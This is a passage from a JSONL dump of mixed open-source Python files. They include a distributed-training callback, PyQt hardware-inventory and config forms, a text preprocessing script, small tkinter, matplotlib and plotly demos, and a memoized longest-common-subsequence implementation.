    words = words[:idx]\n                cutoff = 0\n            else:\n                cutoff -= 1\n        for word, _ in words:\n            dictionary[word] = len(dictionary)\n        vocab_size = len(words)\n    data = list()\n    for text_element in text_elements:\n        if text_element in dictionary:\n            index = dictionary[text_element]\n        else:\n            index = dictionary['UNK']\n        data.append(index)\n    reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys())) \n    return data, dictionary, reverse_dictionary, vocab_size\n\n# Find text element for probability distribution over tokens\ndef token_to_text_element(probabilities, reverse_dictionary):\n    return [reverse_dictionary[token] for token in np.argmax(probabilities, 1)]","sub_path":"MikolovJoulinChopraEtAl2015/python/tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"383251035","text":"# -*- coding:utf-8 -*-\n\n# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the MIT License.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# MIT License for more details.\n\n\"\"\"Data parallel callback.\"\"\"\n\nimport logging\nimport vega\nfrom .callback import Callback\nfrom vega.common import ClassFactory, ClassType\nfrom vega.common.general import General\n\nlogger = logging.getLogger(__name__)\n\n\n@ClassFactory.register(ClassType.CALLBACK)\nclass Hccl(Callback):\n \"\"\"Callback that saves the evaluated Performance.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize ModelCheckpoint callback.\"\"\"\n super(Hccl, self).__init__()\n self.priority = 260\n\n def init_trainer(self, logs=None):\n \"\"\"Set trainer object for current callback.\"\"\"\n if not self.trainer.hccl:\n return\n\n if vega.is_torch_backend():\n self._init_pytorch_trainer()\n if vega.is_ms_backend():\n self._init_ms_trainer()\n\n def _init_pytorch_trainer(self):\n import torch\n import torch.distributed as dist\n logger.info(\"init HCCL\")\n model = self.trainer.model\n dist.init_process_group(\n backend='hccl',\n init_method=f\"tcp://{General.cluster.hccl_server_ip}:{General.cluster.hccl_port}\",\n world_size=self.trainer.num_workers,\n rank=self.trainer.rank_id)\n model = torch.nn.parallel.DistributedDataParallel(\n model,\n device_ids=[self.trainer.device_id],\n broadcast_buffers=General.cluster.enable_broadcast_buffers)\n self.trainer.model = model\n\n def _init_ms_trainer(self):\n from mindspore import context\n from mindspore.context import ParallelMode\n from mindspore.communication.management import init\n\n logger.info(\"init HCCL\")\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True)\n init()\n\n def before_epoch(self, epoch, logs=None):\n \"\"\"Be called before each epoach.\"\"\"\n if not vega.is_torch_backend() or not self.trainer.hccl:\n return\n if self.trainer.sampler is not None:\n self.trainer.sampler.set_epoch(epoch)\n\n def after_train(self, logs=None):\n \"\"\"Stop session.\"\"\"\n if self.trainer.hccl and vega.is_tf_backend():\n self.trainer.sess.run(self.trainer.npu_shutdown)\n self.trainer.sess.close()\n","sub_path":"vega/trainer/callbacks/hccl.py","file_name":"hccl.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"603260169","text":"\nimport sys\nfrom PyQt4 import QtGui\nimport io\nimport ConfigParser\nfrom PyQt4.QtGui import *\n \n\n#adding mask to tacking.cfg causes type errors \n#----------------------------------------------------------------------\n\n# Create an PyQT4 application object.\na = QApplication(sys.argv) \n\n# The QWidget widget is the base class of all user interface objects in PyQt4.\nw = QWidget()\n\n# Get filename using QFileDialog\npath = QFileDialog.getOpenFileName(w, 'Open File', '/') \npath1= str(path)\n\nclass gui(QtGui.QWidget):\n\n \n def __init__(self):\n super(gui, self).__init__()\n \n self.initUI()\n \n\n def initUI(self): \n\n self.btn = QtGui.QPushButton('Set Config', self)\n # self.btn.move(20, 20)\n self.btn.clicked.connect(self.createConfig)\n \n self.label1 = QtGui.QLabel(\"first frame to process\")\n # input box \n self.input1 = QtGui.QLineEdit()\n\n self.label2 = QtGui.QLabel(\"number of frames to process\")\n # self.label1.move(130, 22)\n self.input2 = QtGui.QLineEdit()\n # self.le.move(150, 22)\n\n self.label3 = QtGui.QLabel(\"maximum connection-distance\")\n self.input3 = QtGui.QLineEdit()\n\n self.label4 = QtGui.QLabel(\"maximum segmentation-distance\")\n self.input4 = QtGui.QLineEdit()\n\n\n grid = QtGui.QGridLayout()\n 
grid.setSpacing(10)\n\n grid.addWidget(self.label1, 1, 0)\n grid.addWidget(self.input1, 1, 1)\n\n grid.addWidget(self.label2, 2, 0)\n grid.addWidget(self.input2, 2, 1)\n\n grid.addWidget(self.label3, 3, 0)\n grid.addWidget(self.input3, 3, 1)\n\n grid.addWidget(self.label4, 4, 0)\n grid.addWidget(self.input4, 4, 1)\n\n grid.addWidget(self.btn, 5, 0)\n\n self.setLayout(grid) \n \n # window box location and size \n self.setGeometry(500, 100, 550, 150)\n\n self.setWindowTitle('Input config')\n self.show()\n \n \n\n def createConfig(self,path):\n \"\"\"\n Create a config file\n \"\"\"\n config = ConfigParser.ConfigParser()\n\n# add new content to config file \n config.add_section(\"added\")\n config.set(\"added\", \"frame1\", self.input1.text())\n config.set(\"added\", \"nframes\", self.input2.text())\n config.set(\"added\", \"mm-connection-distance\", self.input3.text())\n config.set(\"added\", \"mm-segmentation-distance\", self.input4.text())\n # config.remove_section(\"added\")\n\n # opens a file for writing \n # with open(path,\"wb\") as config_file:\n\n # opens a file for appending \n with open(path1,\"a\") as config_file:\n config.write(config_file)\n\n# to remove the section header from config file \n\n #opens the file to read \n f = open(path1,\"r\")\n lines = f.readlines()\n f.close()\n #opens the file to write \n f = open(path1,\"w\")\n for line in lines:\n #removes the section header \n if line!=\"[added]\"+\"\\n\":\n f.write(line)\n f.close()\n\n \ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = gui()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n\n \n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"451755341","text":"import torch\nfrom torch.utils.data import Dataset\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\nfrom .data_reader import read_image, read_mask\n\n\ndef get_train_transform():\n return A.Compose(\n [\n A.Resize(256, 256),\n A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n A.HorizontalFlip(p=0.25),\n A.VerticalFlip(p=0.25),\n ToTensorV2()\n ])\n\n\n# Dataset Loader\nclass LoadDataSet(Dataset):\n def __init__(self, df, transform=None):\n self.df = df\n self.transforms = transform\n\n def __len__(self):\n return self.df.shape[0]\n\n def __getitem__(self, idx):\n mask_folder = self.df.iloc[idx][\"mask_dir\"]\n image_path = self.df.iloc[idx][\"image_path\"]\n\n img = read_image(image_path)\n mask = read_mask(mask_folder)\n\n augmented = self.transforms(image=img, mask=mask)\n img = augmented['image']\n mask = augmented['mask']\n mask = mask.permute(2, 0, 1)\n mask = torch.div(mask, 255)\n return img, mask\n","sub_path":"Loading/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"132276133","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport datetime\n\nfrom PyQt5.QtWidgets import QDialog, QLabel, QVBoxLayout, QLineEdit, QPushButton, QToolButton, QDateEdit, QTextEdit, QMessageBox, QSpinBox,QComboBox\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QIcon, QFont\nfrom dateutil.relativedelta import relativedelta\nimport data_sets\nimport hw_status\nimport liblogos\nimport models\nimport stdio\nimport libpg\nimport qlib as qc\nimport unit_transfer\n\n\nclass HardwareEdit(QDialog):\n def 
__init__(self, hardwar_dict, parent=None):\n super(HardwareEdit, self).__init__(parent)\n # self.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint | Qt.WindowStaysOnTopHint)\n self.setWindowTitle('Ficha de Equipamento')\n masterLayout = QVBoxLayout(self)\n # vars\n self.hardware_dict = hardwar_dict\n font = QFont('courier new', 10)\n font.setWeight(80)\n font.setBold(False)\n self.hw_id = QLabel()\n self.hw_id.setMaximumWidth(80)\n self.hw_unit_id = QLabel()\n masterLayout.addLayout(qc.addHLayout([self.hw_id, self.hw_unit_id, True]))\n self.md_name = QLabel()\n self.md_name.setStyleSheet(\"background-color: #dbf3ff;\")\n masterLayout.addLayout(qc.addHLayout(['Modelo:', self.md_name], lw=80))\n self.hw_type_name = QLabel()\n self.hw_type_name.setStyleSheet(\"background-color: #dbf3ff; \")\n masterLayout.addLayout(qc.addHLayout(['Tipo', self.hw_type_name], lw=80))\n self.hw_sn = QLineEdit()\n self.hw_sn.setFont(font)\n self.hw_sn.setMaxLength(40)\n self.hw_sn.setReadOnly(True)\n self.hw_sn.setStyleSheet(\"background-color: #dbf3ff;\")\n self.hw_sn.textEdited.connect(self.serial_edited)\n \n masterLayout.addLayout(qc.addHLayout(['N/S:', self.hw_sn], lw=80))\n self.hw_status = QLabel()\n self.hw_status.setStyleSheet(\"background-color: #dbf3ff;\")\n hw_status_change = QToolButton()\n hw_status_change.setIcon(QIcon('.//img//edit.png'))\n hw_status_change.clicked.connect(self.hw_status_click)\n masterLayout.addLayout(qc.addHLayout(['Estado:', self.hw_status, hw_status_change, True], lw=80))\n masterLayout.addWidget(qc.HLine())\n self.unitNameLb = QLabel()\n self.unitNameLb.setMaximumWidth(200)\n unitChangeTBt = QToolButton()\n unitChangeTBt.setIcon(QIcon('.//img//change_unit.png'))\n masterLayout.addLayout(qc.addHLayout(['Unidade:', self.unitNameLb, True, unitChangeTBt], lw=80))\n self.hw_function = QLineEdit()\n self.hw_function.setMaxLength(20)\n self.hw_function.setMaximumWidth(200)\n masterLayout.addLayout(qc.addHLayout(['Função:', self.hw_function, True], lw=80))\n masterLayout.addWidget(qc.HLine())\n self.hw_invoice_date = QDateEdit()\n self.hw_invoice_date.setMaximumWidth(100)\n self.hw_invoice_date.setDisplayFormat(\"dd.MM.yyyy\")\n self.hw_invoice = QLineEdit()\n self.hw_invoice.setMaxLength(10)\n self.hw_invoice.setMaximumWidth(100)\n self.hw_warranty = QSpinBox()\n self.hw_warranty.setMaximumWidth(70)\n self.hwSellAgeLabel = QLabel()\n self.hwSellAgeLabel.setStyleSheet(\"color: #FF10ff;\")\n masterLayout.addLayout(qc.addHLayout(['Doc. Venda:', self.hw_invoice, 'Data:', self.hw_invoice_date, 'Garantia:', self.hw_warranty, True], lw=80))\n masterLayout.addLayout(qc.addHLayout(['I. 
Venda:', self.hwSellAgeLabel]))\n masterLayout.addWidget(qc.HLine())\n self.hw_supplier = QLineEdit()\n self.hw_supplier.setMaxLength(40)\n self.hw_supplier.setMaximumWidth(200)\n masterLayout.addLayout(qc.addHLayout(['Fornecedor:', self.hw_supplier, True], lw=80))\n self.hw_supplier_date = QDateEdit()\n self.hw_supplier_date.setMaximumWidth(100)\n self.hw_supplier_date.setDisplayFormat(\"dd.MM.yyyy\")\n self.hw_invoice_supplier = QLineEdit()\n self.hw_invoice_supplier.setMaxLength(10)\n self.hw_invoice_supplier.setMaximumWidth(100)\n self.hw_supplier_warranty = QSpinBox()\n self.hw_supplier_warranty.setMaximumWidth(70)\n masterLayout.addLayout(qc.addHLayout(['Factura:', self.hw_invoice_supplier, 'Data:', self.hw_supplier_date, 'Garantia',\n self.hw_supplier_warranty, True], lw=80))\n\n self.hwBuyAgeLabel = QLabel()\n self.hwBuyAgeLabel.setStyleSheet(\"color: #FF10ff;\")\n masterLayout.addLayout(qc.addHLayout(['I. Compra:', self.hwBuyAgeLabel]))\n self.hw_obs = QTextEdit()\n self.hw_obs.setMaximumHeight(200)\n masterLayout.addWidget(self.hw_obs)\n saveBtn = QPushButton('Guardar')\n saveBtn.clicked.connect(self.save_click)\n exitBtn = QPushButton('Sair')\n exitBtn.clicked.connect(self.exit_click)\n masterLayout.addLayout(qc.addHLayout([saveBtn, exitBtn]))\n if self.hardware_dict['hw_id'] == -1:\n form = models.ModelsBrowser({'mode': 1})\n form.exec_()\n if 'brand_name' in form.ret:\n self.hardware_dict['md_name'] = form.ret['brand_name'] + ' ' + form.ret['model_name']\n self.hardware_dict['model_id'] = form.ret['model_id']\n self.hardware_dict['hw_type_name'] = form.ret['hw_type_name']\n self.hw_sn.setReadOnly(False)\n self.hw_sn.setStyleSheet(\"background-color: #00ff00;\")\n self.init_form()\n self.refresh_form()\n else:\n saveBtn.setEnabled(False)\n else:\n self.hardware_dict = data_sets.hardware_to_dict(self.hardware_dict['hw_id'])\n unitChangeTBt.clicked.connect(self.hw_change_unit)\n self.refresh_form()\n \n def hw_status_click(self):\n form = hw_status.HardwareStatus()\n form.exec_()\n if form.ret[0]:\n self.hw_status.setText(form.ret[1])\n if form.ret[2] == 0:\n self.hardware_dict['hw_unit_id'] = 0 # em stock\n if form.ret[2] == 3:\n self.hardware_dict['hw_unit_id'] = 99999 # emprestimo\n \n def hw_change_unit(self):\n form = unit_transfer.HardwareTransfer(self.hardware_dict)\n form.exec_()\n if form.ret:\n self.close()\n \n def init_form(self):\n self.hardware_dict['hw_id'] = -1\n self.hardware_dict['hw_sn'] = ''\n self.hardware_dict['hw_status_name'] = 'Activo'\n self.hardware_dict['hw_status_id'] = 2\n self.hardware_dict['hw_function'] = ''\n self.hardware_dict['hw_invoice'] = 'n/a'\n self.hardware_dict['hw_invoice_date'] = datetime.datetime(2012, 0o1, 0o1)\n self.hardware_dict['hw_warranty'] = 0\n self.hardware_dict['hw_supplier'] = 'n/a'\n self.hardware_dict['hw_supplier_warranty'] = 0\n if 'un_name' in self.hardware_dict:\n pass\n else:\n self.hardware_dict['un_name'] = ''\n self.hardware_dict['hw_supplier_date'] = datetime.datetime(2012, 0o1, 0o1) # datetime.datetime.now()\n self.hardware_dict['hw_invoice_supplier'] = 'n/a'\n self.hardware_dict['hw_obs'] = ''\n \n def refresh_form(self):\n self.hw_id.setText(str(self.hardware_dict['hw_id']) + '-' + '{0:x}'.format(self.hardware_dict['hw_id']).upper())\n self.md_name.setText(self.hardware_dict['md_name'])\n self.hw_type_name.setText(self.hardware_dict['hw_type_name'])\n self.hw_sn.setText(self.hardware_dict['hw_sn'])\n self.hw_status.setText(self.hardware_dict['hw_status_name'])\n 
self.hw_function.setText(self.hardware_dict['hw_function'])\n self.hw_invoice.setText(self.hardware_dict['hw_invoice'])\n try:\n self.hw_invoice_date.setDate(self.hardware_dict['hw_invoice_date'])\n except TypeError:\n self.hw_invoice_date.setDate(datetime.datetime.now() - relativedelta(years=10))\n self.hw_warranty.setValue(self.hardware_dict['hw_warranty'])\n self.hw_supplier.setText(self.hardware_dict['hw_supplier'])\n try:\n self.hw_supplier_date.setDate(self.hardware_dict['hw_supplier_date'])\n except TypeError:\n self.hw_supplier_date.setDate(datetime.datetime.now() - relativedelta(years=10))\n self.hw_invoice_supplier.setText(self.hardware_dict['hw_invoice_supplier'])\n self.unitNameLb.setText(self.hardware_dict['un_name'])\n self.hw_supplier_warranty.setValue(self.hardware_dict['hw_supplier_warranty'])\n self.hw_obs.setText(self.hardware_dict['hw_obs'])\n self.hwSellAgeLabel.setText(td_format(datetime.datetime.today().date() - self.hw_invoice_date.date().toPyDate()))\n self.hwBuyAgeLabel.setText(td_format(datetime.datetime.today().date() - self.hw_supplier_date.date().toPyDate()))\n \n def insert_record(self):\n a = ()\n sql = '''insert into hardware(\n hw_model_id, hw_sn, hw_unit_id, hw_function, hw_invoice, hw_invoice_date, hw_supplier,\n hw_warranty, hw_supplier_date, hw_invoice_supplier, hw_supplier_warranty, hw_obs, hw_status_id)\n VALUES (%s,%s,%s, %s,%s,%s, %s,%s,%s, %s,%s,%s, 1) '''\n data = (self.hardware_dict['model_id'],)\n data += (str(stdio.write_field(self.hw_sn)).upper(),)\n data += (self.hardware_dict['hw_unit_id'],)\n data += (stdio.write_field(self.hw_function),)\n data += (stdio.write_field(self.hw_invoice),)\n data += (stdio.write_field(self.hw_invoice_date),)\n data += (stdio.write_field(self.hw_supplier),)\n data += (stdio.write_field(self.hw_warranty),)\n data += (stdio.write_field(self.hw_supplier_date),)\n data += (stdio.write_field(self.hw_invoice_supplier),)\n data += (stdio.write_field(self.hw_supplier_warranty),)\n data += (stdio.write_field(self.hw_obs),)\n libpg.execute_query(sql, data)\n liblogos.hardware_update_settings(self.hardware_dict['hw_unit_id'])\n self.close()\n \n def update_record(self):\n sql = '''UPDATE hardware set\n hw_unit_id=%s,\n hw_function=%s,\n hw_invoice=%s,\n hw_invoice_date=%s,\n hw_warranty=%s,\n hw_supplier=%s,\n hw_supplier_date=%s,\n hw_model_id=%s,\n hw_invoice_supplier=%s,\n hw_supplier_warranty=%s,\n hw_obs=%s,\n hw_status_id=(select hwd_status_id from hw_status where lower(hwd_status_name) = %s)\n WHERE hw_id= %s'''\n data = (self.hardware_dict['hw_unit_id'],)\n data += (stdio.write_field(self.hw_function),)\n data += (stdio.write_field(self.hw_invoice),)\n data += (stdio.write_field(self.hw_invoice_date),)\n data += (stdio.write_field(self.hw_warranty),)\n data += (stdio.write_field(self.hw_supplier),)\n data += (stdio.write_field(self.hw_supplier_date), self.hardware_dict['hw_model_id'])\n data += (stdio.write_field(self.hw_invoice_supplier),)\n data += (stdio.write_field(self.hw_supplier_warranty),)\n data += (stdio.write_field(self.hw_obs),)\n data += (self.hw_status.text().lower(),)\n data += (self.hardware_dict['hw_id'],)\n libpg.execute_query(sql, data)\n liblogos.hardware_update_settings(self.hardware_dict['hw_unit_id'])\n \n def exit_click(self):\n self.close()\n \n def save_click(self):\n if self.hardware_dict['hw_id'] == -1:\n a = libpg.query_one('select hw_id from hardware where hw_sn = %s', (self.hw_sn.text().upper(),))\n if a is None:\n self.insert_record()\n else:\n QMessageBox.critical(None,\"Pesquisa 
de Numero de Série\",\"O numero de série já existe na Base de Dados\",\n QMessageBox.StandardButtons(QMessageBox.Close), QMessageBox.Close)\n else:\n self.update_record()\n self.close()\n\n def serial_edited(self):\n a = self.hw_sn.text().upper()\n a = a.replace('-','')\n a = a.replace('.','')\n a = a.replace('(','')\n a = a.replace(')','')\n a = a.replace('/','')\n a = a.replace(',','')\n a = a.replace('#','')\n a = a.replace(' ','')\n a = a.replace('_','')\n a = a.replace('[','')\n a = a.replace(']','')\n self.hw_sn.setText(a)\n\n\ndef td_format(td_object):\n seconds = int(td_object.total_seconds())\n periods = [\n ('ano', 60*60*24*365),\n ('mese', 60*60*24*30),\n ('dia', 60*60*24),\n ('hour', 60*60),\n ('minute', 60),\n ('second', 1)\n ]\n strings = []\n for period_name, period_seconds in periods:\n if seconds > period_seconds:\n period_value , seconds = divmod(seconds, period_seconds)\n has_s = 's' if period_value > 1 else ''\n strings.append(\"%s %s%s\" % (period_value, period_name, has_s))\n return \", \".join(strings)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"hardware_edit.py","file_name":"hardware_edit.py","file_ext":"py","file_size_in_byte":13015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"295398902","text":"# -*- coding: utf-8 -*-\n\nif __name__ == '__main__':\n import re\n import os\n import json\n import docx\n\n # 要预处理的文件夹路径\n base_path = \"english_pro_module/raw_data/\"\n base_path_processed = \"english_pro_module/raw_data_processed/\"\n # 要替换的中英文符号\n rep = {',': ',', '。': '.', '?': '?', '!': '!', ';': ';', ':': ':', '(': '(', ')': ')',\n '“': '\"', '”': '\"'}\n\n # 格式化字符串\n def format_str(rep, str):\n rep = dict((re.escape(k), v) for k, v in rep.items())\n pattern = re.compile(\"|\".join(rep.keys()))\n str_format = pattern.sub(lambda m: rep[re.escape(m.group(0))], str)\n\n return str_format\n\n # 处理txt文件\n def process_txt(file):\n file_list = []\n if not os.path.isdir(file):\n f = open(base_path + \"/\" + file)\n iter_f = iter(f)\n for line in iter_f:\n str_format = format_str(rep, line)\n file_list.append(str_format)\n\n file_object = open(base_path + \"/\" + file, 'w')\n for line in file_list:\n file_object.write(line)\n file_object.write('\\n')\n file_object.close()\n\n # 处理docx文件\n def process_docx(file):\n word = docx.Document(base_path + file)\n word_processed = docx.Document()\n for para in word.paragraphs:\n str_format = format_str(rep, para.text)\n word_processed.add_paragraph(str_format)\n word_processed.save(base_path + file.split('.')[0] + '_processed.docx')\n\n # 处理json文件\n def process_json(file):\n with open(base_path + file) as f:\n pop_data = json.load(f)\n for pop_dict in pop_data:\n for i in range(len(pop_dict['groupQuestions'])):\n format_article = format_str(rep, pop_dict['groupQuestions'][i]['article'])\n pop_dict['groupQuestions'][i]['article'] = format_article\n for j in range(len(pop_dict['groupQuestions'][i]['questions'])):\n title = format_str(rep, pop_dict['groupQuestions'][i]['questions'][j]['title'])\n pop_dict['groupQuestions'][i]['questions'][j]['title'] = title\n for m in range(len(pop_dict['groupQuestions'][i]['questions'][j]['answers'])):\n answer = format_str(rep, pop_dict['groupQuestions'][i]['questions'][j]['answers'][m])\n pop_dict['groupQuestions'][i]['questions'][j]['answers'][m] = answer\n\n print(pop_data)\n with open(base_path + file, 'w') as f:\n json.dump(pop_data, f)\n\n # 预处理数据\n def preprocessData():\n process_docx('correction.docx')\n 
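The serial_edited slot in the hardware_edit.py record above strips punctuation with a dozen chained str.replace calls. A single regular expression covers the same characters; a minimal sketch, assuming the goal is "uppercase alphanumerics only":

import re

def clean_serial(raw):
    """Uppercase and drop everything outside 0-9/A-Z in one pass."""
    return re.sub(r"[^0-9A-Z]", "", raw.upper())

assert clean_serial("ab-12.(3)/4 #x") == "AB1234X"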
process_txt('phrase.txt')\n process_txt('words.txt')\n process_json('listening.json')\n\n preprocessData()","sub_path":"Server/ExermonServer/preprocessData.py","file_name":"preprocessData.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146172682","text":"import requests, json\nfrom tkinter import *\n\ndef click1():\n label1 = Label(frame1, text=\"Frame 1 open\")\n label1.pack()\n\ndef click2():\n label1 = Label(frame1, text=\"Frame 2 open\")\n label1.pack()\n\n\nwindow = Tk()\nwindow.geometry(\"400x400\")\n\n\nbtn1 = Button(window, text=\"frame1\", command=click1)\nbtn1.pack()\n\nbtn2 = Button(window, text=\"frame2\", command=click2)\nbtn2.pack()\n\nframe1 = Frame(window, bg=\"blue\", width=100, height=100)\nframe1.pack()\n\nlabel3 = Label(frame1, bg=\"black\", fg=\"white\", text=\"Label 3 in Frame 1\")\nlabel3.pack()\n\nwindow.mainloop()\n","sub_path":"tkinterExamples/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"544470920","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 26 23:16:49 2017\n\n@author: subbu\n\"\"\"\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport cv2\nfrom scipy.ndimage.measurements import label\nfrom project_utils import *\n\ny_start_stop = [400, 656] # Min and max in y to search in slide_window()\n\nimage = mpimg.imread('../test_images/test1.jpg')\n\nprint(image.shape)\ndraw_image = np.copy(image)\n\n# Uncomment the following line if you extracted training\n# data from .png images (scaled 0 to 1 by mpimg) and the\n# image you are searching is a .jpg (scaled 0 to 255)\nimage = image.astype(np.float32)/255\n\nbbox_list = []\nfor scale in [1,1.5,2]:\n bblist = find_cars(image, y_start_stop[0], y_start_stop[1], scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n bbox_list = bbox_list + bblist\n\nheat = np.zeros_like(image[:,:,0]).astype(np.float)\nheat = add_heat(heat,bbox_list)\nheat = apply_threshold(heat,1) \nheatmap = np.clip(heat, 0, 255)\nlabels = label(heatmap)\ndraw_img = draw_labeled_bboxes(draw_image, labels)\n\n\nfig = plt.figure()\nplt.subplot(121)\nplt.imshow(draw_img)\nplt.title('Car Positions')\nplt.subplot(122)\nplt.imshow(heatmap, cmap='hot')\nplt.title('Heat Map')\nfig.tight_layout()\n","sub_path":"pyfiles/project_test.py","file_name":"project_test.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"611874240","text":"import requests # API requesting\nimport datetime, time # time functionsality\nimport ast # dictionay functionality\nimport matplotlib.pyplot as plt \nimport sys\nimport plotly.graph_objects as go # graphical\n\nimport stock_func as sf\n# Time (Month ago) -------------------------------------------------------------------\n\nlM_timeStamp,lM_unix,lY_timeStamp,lY_unix,curr_unix, D,M,Y = sf.getdate()\n\n# STOCK ------------------------------------------------------------------------\n\n#TYPE options: 'stock/profile', 'quote'\ntypeURL = 'quote'\nticker = 'IBM' # str(input(\"Ticker Name: \"))\ntickerURL = '?symbol=' + ticker\n\ndata_time = 'M' # str(input('View DATA over last Year or Month [Y/M]'))\n\nstockCandleUrl, currStockPriceURL = sf.glueURL(tickerURL, lY_unix, lM_unix, curr_unix, 
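project_test.py above imports add_heat and apply_threshold from a project_utils module that is not part of this record. These are hypothetical but conventional implementations of the two heat-map helpers, assuming each bounding box is an ((x1, y1), (x2, y2)) pair:

import numpy as np

def add_heat(heatmap, bbox_list):
    # Add 1 inside every detection window; overlapping detections accumulate.
    for (x1, y1), (x2, y2) in bbox_list:
        heatmap[y1:y2, x1:x2] += 1
    return heatmap

def apply_threshold(heatmap, threshold):
    # Zero out pixels supported by too few overlapping detections.
    heatmap[heatmap <= threshold] = 0
    return heatmap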
data_time)\n\nstockCandleREQ = requests.get(stockCandleUrl)\ncurrSPREQ = requests.get(currStockPriceURL)\n\nstockCandle_fileCheck = str(stockCandleREQ.json())\ncurrSP_fileCheck = str(currSPREQ.json())\n\nstockCandleDATA = ast.literal_eval(stockCandle_fileCheck)\ncurrSPDATA = ast.literal_eval(currSP_fileCheck)\n\n# Checks if the ticker Exists\nsf.fileCheck(stockCandle_fileCheck, stockCandleDATA, currSP_fileCheck, currSPDATA)\n\n# Plotting Candle Data\n\ncloseCandlePrice = stockCandleDATA['c'[0]]\ntimeStamp = 0\ncurrStockPrice = currSPDATA['c']\n\nx_axis = [datetime.datetime.utcfromtimestamp(stockCandleDATA['t'[0]][i]).strftime('%Y-%m-%d') for i in range(len(closeCandlePrice))]\n\n# Plotly\nfig = go.Figure()\nfig.add_trace(go.Scatter(x=x_axis, y=closeCandlePrice,\n mode='lines',\n name='closingStockPrice'))\nfig.show()\n\n\n","sub_path":"stock_api.py","file_name":"stock_api.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"622838896","text":"\"\"\"\nAA, December 2020\nAssignment 1: Estratégias de Desenvolvimento de Algoritmos \n - The Longest Common Subsequence Problem\nAutor: Ana Sofia Fernandes, 88739\n\"\"\"\nfrom functools import *\nimport sys\nimport time\n\n##Class that calculates Longest Common Subsquence for two given strings, using memoization\n\nclass LCS_memoization_wrapper:\n\n def __init__(self, seqA , seqB):\n self.seqA = seqA\n self.seqB = seqB\n self.not_in_cache = 0\n self.cache_access = 0\n self.max_calc = 0\n self.sum_count = 0\n sys.setrecursionlimit(150000)\n\n def memo(self,func):\n\n \"\"\"\n Verifies if a given subproblem already exists - if so, the program\n accede to the cache and it doesn't have to be done recursively\n \"\"\"\n\n cache = {}\n @wraps(func)\n def wrap (*args):\n if args not in cache: \n self.not_in_cache += 1 \n cache[args] = func(*args)\n else:\n self.cache_access += 1 \n return cache[args]\n return wrap\n\n\n def lcs_recursive_way(self ,m, n):\n\n \"\"\"\n This function will calculate, in a recursive way, the len of the \n longest subsquence between two sequences. 
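Two quirks in the stock_api.py record above: stockCandleDATA['c'[0]] indexes the string literal, so it is simply stockCandleDATA['c'], and round-tripping the response through str() plus ast.literal_eval breaks on JSON literals such as true/false/null. requests can decode JSON directly; a hedged sketch:

import requests

def fetch_json(url):
    response = requests.get(url, timeout=10)
    response.raise_for_status()   # surface HTTP errors instead of parsing error pages
    return response.json()        # already a dict; no str()/literal_eval round trip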
There are two cases:\n 1-The last character match - increment the length and proceed in the sequence (-1 in each)\n 2-The last character doesn't match - find the max between lcs_recursive_way(m-1,n) and lcs_recursive_way(m, n-1)\n \"\"\"\n \n # The len of each sequence passed will be used so that a for loop can be avoided\n if (m==0 or n==0): #If any have len=0, 0 will be returned\n return 0\n\n elif (self.seqA[m-1] == self.seqB[n-1]): #If the symbols match, 1 is added to the len (we have a match) \n #and a move in each sequence is made\n self.sum_count += 1\n return 1 + self.lcs_recursive_way(m-1,n-1)\n \n else: # If there's no match in that position\n self.max_calc += 1\n return max(self.lcs_recursive_way(m-1,n), self.lcs_recursive_way(m, n-1)) #We move in each sequence and check which\n #one returns a max value for the len\n\n def get_lcs_len_memoization(self):\n\n \"\"\"\n Getter for lcs len\n \"\"\"\n\n start_time = time.time()\n self.lcs_recursive_way = self.memo(self.lcs_recursive_way)\n final= self.lcs_recursive_way(len(self.seqA), len(self.seqB))\n end_time = time.time() - start_time\n print(\"\\nAlgorithm used - memoization \\n\"\n +\"\\n--- LCS len: %s \" % (final) \n +\"\\n--- Execution time: %s seconds\" % (round(end_time,7))\n +\"\\n--- Basic operations: %s sums and %s maximum calculations\" % (self.sum_count, self.max_calc)\n +\"\\n--- Number of cache accesses: %s \" % (self.cache_access)\n +\"\\n--- The subproblem wasn't in cache %s times.\" % 